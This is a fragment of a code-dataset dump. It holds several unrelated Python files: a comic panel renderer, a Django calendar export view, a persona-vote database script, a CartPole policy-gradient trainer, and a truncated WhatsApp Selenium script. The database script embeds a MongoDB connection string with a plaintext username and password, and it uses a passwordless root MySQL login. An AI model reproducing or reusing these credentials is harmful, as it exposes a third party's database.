"call"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 66, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.optim.LBFGS", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 75, "usage_type": "attribute"}, {"api_name": "torchdiffeq.odeint_adjoint", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.is_grad_enabled", "line_number": 100, "usage_type": "call"}, 
{"api_name": "os.path.dirname", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path", "line_number": 113, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 129, "usage_type": "call"}, {"api_name": "torchdiffeq.odeint_adjoint", "line_number": 130, "usage_type": "call"}]} +{"seq_id": "208889231", "text": "import cairocffi as cairo\nimport collections\nimport math\nimport random\nimport z3\n\nfrom comic import handdraw\nfrom comic import geom\nfrom comic import text\n\n\nDialog = collections.namedtuple(\"Dialog\", \"speaker text\")\n\n\ndef make_stick_figure(s, name):\n stick_figure = geom.Rectangle(s, name)\n s.add(stick_figure.width == 140, stick_figure.height == 225)\n return stick_figure\n\n\ndef draw_stick_figure(ctx):\n # head\n head_radius = 25 + random.randint(-2, 2)\n handdraw.circle(ctx, 25 + random.randint(-5, 5), 27, head_radius)\n\n # eyes\n right_eye_y = 25 - 5 + random.randint(-2, 2)\n\n handdraw.dot(ctx, 25 + 10 + random.randint(-2, 2), right_eye_y)\n handdraw.dot(ctx,\n 25 - 10 + random.randint(-2, 2),\n right_eye_y + random.randint(-2, 2))\n\n # mouth\n ctx.move_to(25 - 10 + random.randint(-2, 2),\n 25 + 10 + random.randint(-2, 2))\n handdraw.line(ctx,\n 25 + 10 + random.randint(-2, 2),\n 25 + 10 + random.randint(-2, 2))\n ctx.close_path()\n\n # body\n leg_point = 125 + random.randint(-5, 25)\n ctx.move_to(25, 25 + head_radius)\n handdraw.line(ctx, 25, leg_point)\n ctx.close_path()\n\n # arms\n arm_point = 60 + random.randint(-5, 25)\n ctx.move_to(25, arm_point)\n handdraw.line(ctx,\n 0 + random.randint(-12, 12), 125 + random.randint(-12, 12))\n ctx.close_path()\n\n ctx.move_to(25, arm_point)\n handdraw.line(ctx,\n 50 + random.randint(-12, 12), 125 + random.randint(-12, 12))\n ctx.close_path()\n\n # legs\n ctx.move_to(25, leg_point)\n handdraw.line(ctx,\n 0 + random.randint(-12, 12),\n leg_point + 40 + random.randint(-12, 12))\n ctx.close_path()\n\n ctx.move_to(25, leg_point)\n handdraw.line(ctx,\n 50 + random.randint(-12, 12),\n leg_point + 40 + random.randint(-12, 12))\n ctx.close_path()\n\n\nclass Panel(object):\n def __init__(self, stick_figures, dialog_texts):\n self.stick_figures = stick_figures\n self.dialog_texts = dialog_texts\n\n def draw(self, ctx, width, height):\n def make_adjoining_line(s, top, bottom, name):\n adjoining_line = geom.Line(s, name)\n s.add(line_frame_constraints(adjoining_line))\n\n s.add(adjoining_line.y0 - top.bottom == 10,\n bottom.top - adjoining_line.y1 == 10,\n adjoining_line.x0 == top.center,\n adjoining_line.x1 == bottom.center)\n\n return adjoining_line\n\n def rect_frame_constraints(rect):\n return z3.And([rect.left >= 0, rect.right <= width,\n rect.top >= 0, rect.bottom <= height])\n\n def line_frame_constraints(line):\n return z3.And([line.x0 >= 0, line.x0 <= width,\n line.x1 >= 0, line.x1 <= width,\n line.y0 >= 0, line.y0 <= height,\n line.y1 >= 0, line.y1 <= height])\n\n s = z3.Optimize()\n\n stick_figures = {}\n stick_figure_list = []\n\n speaker_dialogs = {}\n label_rects = []\n\n ascent, descent, h, max_x_advance, max_y_advance = ctx.font_extents()\n\n for i, label in enumerate(self.stick_figures):\n stick_figure = make_stick_figure(s, \"stick_figure_\" + str(i))\n stick_figures[label] = stick_figure\n 
stick_figure_list.append(stick_figure)\n\n speaker_dialogs[label] = []\n\n x_bearing, y_bearing, w, _, x_advance, y_advance = ctx.text_extents(label)\n\n label_rect = geom.Rectangle(s, \"label_\" + str(i))\n s.add(rect_frame_constraints(label_rect),\n stick_figure.bottom >= int(0.8 * height),\n label_rect.width == w, label_rect.height == h,\n label_rect.left >= 50, label_rect.right <= (width - 50),\n label_rect.bottom <= (height - 20),\n label_rect.flex_center(stick_figure, 0, 5),\n label_rect.flex_below(stick_figure, 2, 5))\n label_rects.append(label_rect)\n\n dialogs = []\n\n adjoining_lines = []\n\n # add stick figure constraints\n for left, right in zip(stick_figure_list, stick_figure_list[1:]):\n s.add(right.flex_right_of(left, 5, 100),\n right.flex_top(left, 0, 10))\n\n s.add(geom.abs(stick_figure_list[0].left -\n (width - stick_figure_list[-1].right)) < 100)\n\n if self.dialog_texts:\n # create dialog rects\n for i, dialog_text in enumerate(self.dialog_texts):\n dialog = text.make_text(ctx, s, dialog_text.text)\n\n s.add(rect_frame_constraints(dialog.rect),\n dialog.rect.left >= 50, dialog.rect.right <= (width - 50),\n dialog.rect.top >= 50)\n\n my_dialogs = speaker_dialogs[dialog_text.speaker]\n\n dialogs.append(dialog)\n my_dialogs.append(dialog)\n\n # position dialogs close to each other\n for above, below in zip(dialogs, dialogs[1:]):\n s.add(above.rect.flex_above(below.rect, 25, 100))\n\n # add stick_figure dialog-specific constraints\n for i, stick_figure in enumerate(stick_figure_list):\n my_dialogs = speaker_dialogs[self.stick_figures[i]]\n\n if my_dialogs:\n # add adjoining line between the last dialog line and the stick figure\n adjoining_lines.append(make_adjoining_line(\n s, my_dialogs[-1].rect, stick_figure,\n \"adjoining_line_stick_figure_\" + str(i)))\n\n # add adjoining lines between each dialog\n for above, below in zip(my_dialogs, my_dialogs[1:]):\n adjoining_lines.append(make_adjoining_line(\n s, above.rect, below.rect, hex(id(above)) + \".\" + hex(id(below))))\n\n my_dialog = None\n for my_dialog in my_dialogs:\n # keep the dialog centered by the stick figure\n s.add(my_dialog.rect.flex_center(stick_figure, 0, 25))\n\n if my_dialog is not None:\n # make sure the stick_figure is below this dialog\n s.add(stick_figure.below(my_dialog.rect))\n\n # position last dialog line above its speaker\n last_speaker = stick_figure_list[\n self.stick_figures.index(self.dialog_texts[-1].speaker)]\n last_dialog = dialogs[-1]\n\n s.add(last_dialog.rect.flex_above(last_speaker, 25, 100))\n\n assert s.check() == z3.sat\n model = s.model()\n\n ctx.set_source_rgb(0.0, 0.0, 0.0)\n\n # draw adjoining lines\n for adjoining_line in adjoining_lines:\n m = adjoining_line.extract_model(model)\n ctx.move_to(m.x0, m.y0)\n handdraw.line(ctx, m.x1, m.y1)\n ctx.close_path()\n\n ctx.stroke()\n\n # draw dialog\n for dialog in dialogs:\n for word in dialog.words:\n r = word.rect.extract_model(model)\n\n ctx.save()\n ctx.set_source_rgb(1.0, 1.0, 1.0)\n ctx.rectangle(r.left - 5, r.top -5, r.width + 10, r.height + 10)\n ctx.fill()\n ctx.restore()\n\n for word in dialog.words:\n r = word.rect.extract_model(model)\n\n ctx.save()\n ctx.move_to(r.left, r.top + ascent)\n ctx.show_text(word.text)\n ctx.restore()\n\n # draw border\n handdraw.rectangle(ctx, 10, 10, width - 10, height - 10)\n\n # draw stick figures\n for stick_figure in stick_figure_list:\n m = stick_figure.extract_model(model)\n ctx.save()\n ctx.translate(m.left + 50, m.top)\n draw_stick_figure(ctx)\n ctx.restore()\n\n ctx.stroke()\n\n # draw 
labels\n for label, label_rect in zip(self.stick_figures, label_rects):\n m = label_rect.extract_model(model)\n ctx.move_to(m.left, m.top + ascent)\n ctx.show_text(label)\n\n\nclass Comic(object):\n TITLE_SIZE = 30\n TEXT_SIZE = 15\n\n def __init__(self, title, panels, panel_width, panel_height, panels_per_row):\n self.title = title\n self.panels = panels\n self.panel_width = panel_width\n self.panel_height = panel_height\n self.panels_per_row = panels_per_row\n\n @property\n def width(self):\n return self.panel_width * self.panels_per_row + 20\n\n @property\n def height(self):\n return self.panel_height * \\\n math.ceil(len(self.panels) / self.panels_per_row) \\\n + self.TITLE_SIZE + 20\n\n def draw(self, ctx):\n ctx.save()\n ctx.select_font_face(\"Buttweasel\")\n ctx.set_font_size(self.TITLE_SIZE)\n ctx.rectangle(0, 0, self.width, self.height)\n ctx.set_source_rgb(1.0, 1.0, 1.0)\n ctx.fill()\n ctx.set_source_rgb(0.0, 0.0, 0.0)\n ctx.set_line_width(3)\n ctx.set_line_cap(cairo.LINE_CAP_ROUND)\n\n ctx.save()\n ascent, descent, h, max_x_advance, max_y_advance = ctx.font_extents()\n x_bearing, y_bearing, w, _, x_advance, y_advance = ctx.text_extents(\n self.title)\n ctx.move_to((self.panel_width * self.panels_per_row - w) / 2 + random.randint(-2, 2),\n ascent + self.TITLE_SIZE - h / 2 + random.randint(-2, 2))\n ctx.show_text(self.title)\n ctx.restore()\n\n ctx.set_font_size(self.TEXT_SIZE)\n\n for i, panel in enumerate(self.panels):\n x = i % self.panels_per_row\n y = i // self.panels_per_row\n\n ctx.save()\n ctx.translate(x * self.panel_width + 10,\n y * self.panel_height + self.TITLE_SIZE + 10)\n panel.draw(ctx, self.panel_width, self.panel_height)\n ctx.restore()\n\n ctx.restore()", "sub_path": "comic/comic.py", "file_name": "comic.py", "file_ext": "py", "file_size_in_byte": 9046, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "collections.namedtuple", "line_number": 12, "usage_type": "call"}, {"api_name": "comic.geom.Rectangle", "line_number": 16, "usage_type": "call"}, {"api_name": "comic.geom", "line_number": 16, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 23, "usage_type": "call"}, {"api_name": "comic.handdraw.circle", "line_number": 24, "usage_type": "call"}, {"api_name": "comic.handdraw", "line_number": 24, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 24, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 27, "usage_type": "call"}, {"api_name": "comic.handdraw.dot", "line_number": 29, "usage_type": "call"}, {"api_name": "comic.handdraw", "line_number": 29, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 29, "usage_type": "call"}, {"api_name": "comic.handdraw.dot", "line_number": 30, "usage_type": "call"}, {"api_name": "comic.handdraw", "line_number": 30, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 31, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 32, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 35, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 36, "usage_type": "call"}, {"api_name": "comic.handdraw.line", "line_number": 37, "usage_type": "call"}, {"api_name": "comic.handdraw", "line_number": 37, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 38, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 39, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 43, "usage_type": 
"call"}, {"api_name": "comic.handdraw.line", "line_number": 45, "usage_type": "call"}, {"api_name": "comic.handdraw", "line_number": 45, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 49, "usage_type": "call"}, {"api_name": "comic.handdraw.line", "line_number": 51, "usage_type": "call"}, {"api_name": "comic.handdraw", "line_number": 51, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 52, "usage_type": "call"}, {"api_name": "comic.handdraw.line", "line_number": 56, "usage_type": "call"}, {"api_name": "comic.handdraw", "line_number": 56, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 57, "usage_type": "call"}, {"api_name": "comic.handdraw.line", "line_number": 62, "usage_type": "call"}, {"api_name": "comic.handdraw", "line_number": 62, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 63, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 64, "usage_type": "call"}, {"api_name": "comic.handdraw.line", "line_number": 68, "usage_type": "call"}, {"api_name": "comic.handdraw", "line_number": 68, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 69, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 70, "usage_type": "call"}, {"api_name": "comic.geom.Line", "line_number": 81, "usage_type": "call"}, {"api_name": "comic.geom", "line_number": 81, "usage_type": "name"}, {"api_name": "z3.And", "line_number": 92, "usage_type": "call"}, {"api_name": "z3.And", "line_number": 96, "usage_type": "call"}, {"api_name": "z3.Optimize", "line_number": 101, "usage_type": "call"}, {"api_name": "comic.geom.Rectangle", "line_number": 120, "usage_type": "call"}, {"api_name": "comic.geom", "line_number": 120, "usage_type": "name"}, {"api_name": "comic.geom.abs", "line_number": 139, "usage_type": "call"}, {"api_name": "comic.geom", "line_number": 139, "usage_type": "name"}, {"api_name": "comic.text.make_text", "line_number": 145, "usage_type": "call"}, {"api_name": "comic.text", "line_number": 145, "usage_type": "name"}, {"api_name": "z3.sat", "line_number": 191, "usage_type": "attribute"}, {"api_name": "comic.handdraw.line", "line_number": 200, "usage_type": "call"}, {"api_name": "comic.handdraw", "line_number": 200, "usage_type": "name"}, {"api_name": "comic.handdraw.rectangle", "line_number": 225, "usage_type": "call"}, {"api_name": "comic.handdraw", "line_number": 225, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 262, "usage_type": "call"}, {"api_name": "cairocffi.LINE_CAP_ROUND", "line_number": 274, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 280, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 281, "usage_type": "call"}]} +{"seq_id": "419122835", "text": "from django.http import HttpResponseRedirect, HttpResponse\nfrom django.shortcuts import render\nfrom .forms import UploadText, convert2calendar, get_time, create_csv_download\n\nimport csv\n\ndef index(request):\n if request.method == 'POST':\n form = UploadText(request.POST)\n if form.is_valid():\n data = convert2calendar(form.cleaned_data['regHtml'])\n open_day = form.cleaned_data['open_date_semester']\n end_day = form.cleaned_data['end_date_semester']\n\n content = create_csv_download(open_day, end_day, data)\n\n response = HttpResponse(content_type='text/ics')\n response['Content-Disposition'] = 'attachment; filename=\"export.ics\"'\n response.write(content)\n return response\n\n else:\n form = UploadText()\n return render(request, 
'genclass/index.html', {'form': form})", "sub_path": "gcalendar_gen_class/genclass/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 878, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "forms.UploadText", "line_number": 9, "usage_type": "call"}, {"api_name": "forms.convert2calendar", "line_number": 11, "usage_type": "call"}, {"api_name": "forms.create_csv_download", "line_number": 15, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 17, "usage_type": "call"}, {"api_name": "forms.UploadText", "line_number": 23, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "150083162", "text": "import operator\nimport MySQLdb\nimport pymongo\nfrom pymongo import MongoClient\n#connect to databases\nclient = MongoClient(host='mongodb://austincapobianco:fucksluts10@ds037244.mongolab.com:37244/personanexus', port=37244)\ndb = client['personanexus']\ncollection = db['rawVoteData']\n\n\ndb=MySQLdb.connect(host=\"localhost\", user=\"root\", passwd=\"\", db=\"test\", port=3306)\nmysqlcursor = db.cursor()\n\n\n\n#mysqlcursor.execute(\"\"\"SELECT * FROM plsql;\"\"\")\n#fetch all personas\n#print(mysqlcursor.fetchall())\n\n#mysqlcursor.execute(\"\"\"SELECT * FROM pglsql;\"\"\")\n#fetch all persona groups\n#print(mysqlcursor.fetchall())\n\n#two inputs\n#personaID and groupID (fire from group 1 and the directions group)\ninitialQueryPID = 9\nqueryGID = 5\n\n#get all personaIDs associated with queryGID\nPIDsInGID = []\nmysqlcursor.execute(\"\"\"SELECT personaID FROM plsql WHERE groupID = %s;\"\"\", (queryGID,))\nfor item in mysqlcursor.fetchall():\n #print(item)\n PIDsInGID += item\n\nPIDdict ={}\n#for each one find the yesvotes/totalvotes\nfor PID in PIDsInGID:\n cursor = collection.find({\"$and\": [{\"personacombo\":initialQueryPID},{\"personacombo\":PID}] }, projection={'yesvotes':1,'totalvotes':1})\n for document in cursor:\n ratio = document['yesvotes']/document['totalvotes']\n PIDdict[PID] = ratio\n #print(str(PID) + ':' + str(ratio))\n #print(document['yesvotes'])\nprint(PIDdict)\nif any(PIDdict) == False: #check if dict is empty first\n print(\"sorry bro not enough data\")\n#dict.item instead of dict.iteritems cause python 3\nelse: print(max(PIDdict.items(), key=operator.itemgetter(1))[0])\n \n", "sub_path": "process_personanexus_data_old.py", "file_name": "process_personanexus_data_old.py", "file_ext": "py", "file_size_in_byte": 1587, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pymongo.MongoClient", "line_number": 6, "usage_type": "call"}, {"api_name": "MySQLdb.connect", "line_number": 11, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "633267675", "text": "# A simple policy gradient approach for CartPole based on OpenAI\n# spinning up:\n# https://spinningup.openai.com/en/latest/spinningup/rl_intro3.html#other-forms-of-the-policy-gradient\n#\n# The trained model is able to get solve CartPole under a specified\n# default_max_steps.\n\nimport gym\nimport numpy as np\nimport tensorflow as tf\n\nfrom absl import logging\nfrom drl_playground.test_env.bandit import BanditEnv\nfrom tqdm import tqdm\n\nlogging.set_verbosity(logging.INFO)\n\n# Set up the gym environment and global variables related to the environment.\nenv = gym.make('CartPole-v0')\n\n# Swap to a simple bandit 
testing environment.\n# env = BanditEnv()\nobservation_dim = env.observation_space.shape[0] # 4\nactions_dim = env.action_space.n # 2\ndefault_max_steps = 100\n\n\ndef build_policy_net():\n \"\"\"\n Build the model for the policy network. The input to the model is a batch of\n observations (None, 4,) and the output is a batch of actions (None, 2,).\n\n Returns:\n model(tf.keras.Model): the sequential policy network.\n\n \"\"\"\n model = tf.keras.models.Sequential([\n tf.keras.layers.Dense(6, batch_input_shape=(None, observation_dim)),\n tf.keras.layers.Activation('relu'),\n # Hidden layers. TODO: make the hidden layers neuron counts tunable.\n tf.keras.layers.Dense(actions_dim),\n ])\n return model\n\n\ndef compute_average_return(model, n_episodes, max_steps=default_max_steps,\n render=False):\n \"\"\"Computes the average cumulative rewards for a model among n episodes.\n\n Args:\n model(tf.keras.Model): the model to be evaluated.\n n_episodes(int): the number of episodes to run, defaults to 20.\n max_steps(int): the max number of steps before terminating an episode.\n render(bool): whether we render the CartPole environments while\n running these simulations.\n\n Returns:\n avg_return(float): the average cumulative reward for the n episodes.\n\n \"\"\"\n sum_episodes_returns = 0\n for episode in range(n_episodes):\n episode_return = 0\n observation = env.reset()\n for t in range(max_steps):\n if render:\n env.render()\n\n action_logits = model.predict(np.expand_dims(observation, axis=0))[\n 0]\n # Select the action greedily at inference time.\n action = np.argmax(action_logits)\n logging.debug(\"selected action: {}\".format(action))\n observation, reward, done, _ = env.step(action)\n episode_return += reward\n if done:\n logging.info(\"Episode finished after {} time steps\".format(t +\n 1))\n break\n\n sum_episodes_returns += episode_return\n logging.info(\"The return for episode {} is {}\".format(episode,\n episode_return))\n\n avg_return = sum_episodes_returns * 1.0 / n_episodes\n\n return avg_return\n\n\n@tf.function\ndef get_loss(reward_weights, action_logits, actions, in_progress):\n \"\"\"Get the loss tensor (None, ) where None represents the batch size.\n\n This follows the simple policy gradient loss function from OpenAI\n spinning up:\n https://spinningup.openai.com/en/latest/spinningup/rl_intro3.html#other-forms-of-the-policy-gradient\n\n Args:\n reward_weights(Tensor): shape (None, 1), dtype float32, cumulative\n rewards per episode used as weights for the policy gradient. None\n represents the number of episodes.\n action_logits(Tensor): shape (None, None, 2), dtype float32, - (episode\n number, time step, the policy model's output logit).\n actions(Tensor): shape(None, None, ) dtype int64 - (batch size,\n time step, ), the true action that was taken at this step.\n in_progress(Tensor): shape (None, None, ), dtype float32, a 0/1 value\n indicating whether the episode was in progress at an action.\n Returns:\n A loss tensor with shape (None, ), dtype float 32 - (batch_size, ). 
The\n gradient of the defined loss is equivalent to the policy gradient.\n\n \"\"\"\n # actions_one_hot shape: (batch_size, action_steps, action_dim)\n actions_one_hot = tf.one_hot(actions, depth=actions_dim,\n dtype=tf.float32, axis=-1)\n # masked_log_softmax shape: (batch_size, action_steps, 2)\n masked_log_softmax = tf.nn.log_softmax(action_logits) * tf.expand_dims(\n in_progress, -1)\n # log_probs shape: (batch_size, action_steps)\n log_probs = tf.reduce_sum(\n masked_log_softmax * tf.cast(\n actions_one_hot, dtype=tf.float32), axis=-1)\n # loss shape: (batch_size, )\n loss = -tf.reduce_mean(reward_weights * log_probs, axis=-1)\n return loss\n\n\ndef train(model, batch_size, max_steps=default_max_steps):\n \"\"\"Perform one gradient update to the model for a batch of episodes.\n\n This follows the simple policy gradient loss function from OpenAI\n spinning up:\n https://spinningup.openai.com/en/latest/spinningup/rl_intro3.html#other-forms-of-the-policy-gradient\n\n Args:\n model(tf.keras.Model): the model to be trained, generated from\n build_policy_net.\n batch_size: the number of episodes in a batch.\n max_steps: the max number of steps the agent can take before we\n declare the game as \"done\".\n\n \"\"\"\n # TODO: Run each episode in parallel to speed up training.\n # a list of action logits tensors for all actions in all episodes. Shape: (\n # batch_size, max_steps, action_logits_tensor).\n all_action_logits = []\n all_actions = []\n # a list of 1/0s representing whether the episode is still in progress or\n # has already finished, for all actions and all episodes.\n all_in_progress = []\n # a list of cumulative rewards tensors for all episodes. Shape (\n # batch_size, reward_tensor).\n all_rewards = []\n\n with tf.GradientTape() as tape:\n tape.watch(model.trainable_weights)\n for _ in range(batch_size):\n obs = env.reset()\n\n eps_rewards = 0\n eps_observations = []\n\n time = 0\n eps_action_logits = []\n eps_actions = []\n eps_in_progress = []\n done = False\n while time < max_steps:\n eps_in_progress.append(\n tf.constant(int(not done), dtype=tf.float32))\n if done:\n eps_action_logits.append(tf.constant(\n 0, dtype=tf.float32, shape=(actions_dim,)))\n eps_actions.append(tf.constant(0, dtype=tf.int64))\n eps_observations.append(tf.constant(0,\n dtype=tf.float32,\n shape=(\n observation_dim,)))\n else:\n eps_observations.append(obs)\n # action_logit shape: (1, 2).\n action_logit = model(np.expand_dims(obs, axis=0))\n eps_action_logits.append(action_logit[0])\n\n # TODO: add temperature for exploration tuning.\n action = tf.random.categorical(action_logit,\n num_samples=1)[0][0]\n eps_actions.append(action)\n obs, reward, done, _ = env.step(action.numpy())\n eps_rewards += reward\n\n time += 1\n\n all_action_logits.append(eps_action_logits)\n all_actions.append(eps_actions)\n all_rewards.append([eps_rewards])\n all_in_progress.append(eps_in_progress)\n\n packed_all_action_logits = tf.stack(all_action_logits)\n packed_all_action_logits = tf.stack(packed_all_action_logits)\n packed_all_actions = tf.stack(all_actions)\n packed_all_actions = tf.stack(packed_all_actions)\n\n loss = get_loss(tf.stack(all_rewards),\n tf.stack(packed_all_action_logits),\n tf.stack(packed_all_actions),\n tf.stack(all_in_progress))\n\n gradient = tape.gradient(loss, model.trainable_weights)\n opt = tf.keras.optimizers.Adam(learning_rate=0.01)\n logging.debug(\"loss: {} \\n, gradient: {} \\n, trainable weights: {} \"\n \"\\n\".format(\n loss, gradient, model.trainable_weights))\n 
opt.apply_gradients(zip(gradient, model.trainable_weights))\n\n\n# Initialize the agent with random weights and evaluate its performance.\npolicy_net = build_policy_net()\nrandom_model_reward = compute_average_return(policy_net, n_episodes=10)\nlogging.info(\"The average reward among all episodes for a randomly initialized \"\n \"model is {}\".format(random_model_reward))\n\nnum_batch = 100\nfor i in tqdm(range(num_batch)):\n train(policy_net, batch_size=128)\ntrained_model_reward = compute_average_return(policy_net, n_episodes=10)\nlogging.info(\n \"The average reward among all episodes for a trained model is {}.\".format(\n trained_model_reward))\nenv.close()\n", "sub_path": "drl_playground/policy_gradient/vanilla_cartpole_main.py", "file_name": "vanilla_cartpole_main.py", "file_ext": "py", "file_size_in_byte": 9245, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "absl.logging.set_verbosity", "line_number": 16, "usage_type": "call"}, {"api_name": "absl.logging", "line_number": 16, "usage_type": "name"}, {"api_name": "absl.logging.INFO", "line_number": 16, "usage_type": "attribute"}, {"api_name": "gym.make", "line_number": 19, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 38, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Activation", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 39, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 41, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 72, "usage_type": "call"}, {"api_name": "absl.logging.debug", "line_number": 73, "usage_type": "call"}, {"api_name": "absl.logging", "line_number": 73, "usage_type": "name"}, {"api_name": "absl.logging.info", "line_number": 77, "usage_type": "call"}, {"api_name": "absl.logging", "line_number": 77, "usage_type": "name"}, {"api_name": "absl.logging.info", "line_number": 82, "usage_type": "call"}, {"api_name": "absl.logging", "line_number": 82, "usage_type": "name"}, {"api_name": "tensorflow.one_hot", "line_number": 114, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 115, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.log_softmax", "line_number": 117, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 117, "usage_type": "attribute"}, {"api_name": "tensorflow.expand_dims", "line_number": 117, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 120, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 121, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 122, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 124, "usage_type": "call"}, {"api_name": "tensorflow.function", "line_number": 90, "usage_type": "attribute"}, {"api_name": "tensorflow.GradientTape", "line_number": 155, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 170, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 170, 
"usage_type": "attribute"}, {"api_name": "tensorflow.constant", "line_number": 172, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 173, "usage_type": "attribute"}, {"api_name": "tensorflow.constant", "line_number": 174, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 174, "usage_type": "attribute"}, {"api_name": "tensorflow.constant", "line_number": 175, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 176, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 182, "usage_type": "call"}, {"api_name": "tensorflow.random.categorical", "line_number": 186, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 186, "usage_type": "attribute"}, {"api_name": "tensorflow.stack", "line_number": 199, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 200, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 201, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 202, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 204, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 205, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 206, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 207, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 210, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 210, "usage_type": "attribute"}, {"api_name": "absl.logging.debug", "line_number": 211, "usage_type": "call"}, {"api_name": "absl.logging", "line_number": 211, "usage_type": "name"}, {"api_name": "absl.logging.info", "line_number": 220, "usage_type": "call"}, {"api_name": "absl.logging", "line_number": 220, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 224, "usage_type": "call"}, {"api_name": "absl.logging.info", "line_number": 227, "usage_type": "call"}, {"api_name": "absl.logging", "line_number": 227, "usage_type": "name"}]} +{"seq_id": "294779974", "text": "from selenium import webdriver\nfrom time import sleep\nimport sys\nimport os\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nfrom session import open_session\n\n\ndef create_group(groupname, contacts, browser=None):\n shouldreturnbrowser = False\n if browser == None:\n shouldreturnbrowser = True\n # data-testid=\"menu\"\n browser = open_session()\n sleep(2)\n browser.find_element_by_css_selector('[data-testid=menu]').click()\n sleep(2)\n browser.find_element_by_css_selector('[title=\"New group\"]').click()\n sleep(8)\n inputbox = browser.find_element(By.CLASS_NAME, \"_17ePo\")\n for name in contacts:\n inputbox.send_keys(name)\n sleep(5)\n inputbox.send_keys(Keys.TAB + Keys.ENTER)\n sleep(1)\n browser.find_element_by_css_selector('[data-testid=\"arrow-forward\"]').click()\n sleep(1)\n browser.find_element(By.CLASS_NAME, \"_3FRCZ\").send_keys(groupname)\n sleep(1)\n browser.find_element(By.CLASS_NAME, \"_3y5oW\").click()\n sleep(3)\n if 